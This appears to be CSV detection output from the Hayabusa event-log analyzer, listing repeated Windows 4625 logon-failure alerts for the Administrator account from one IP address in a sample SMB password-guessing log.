2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
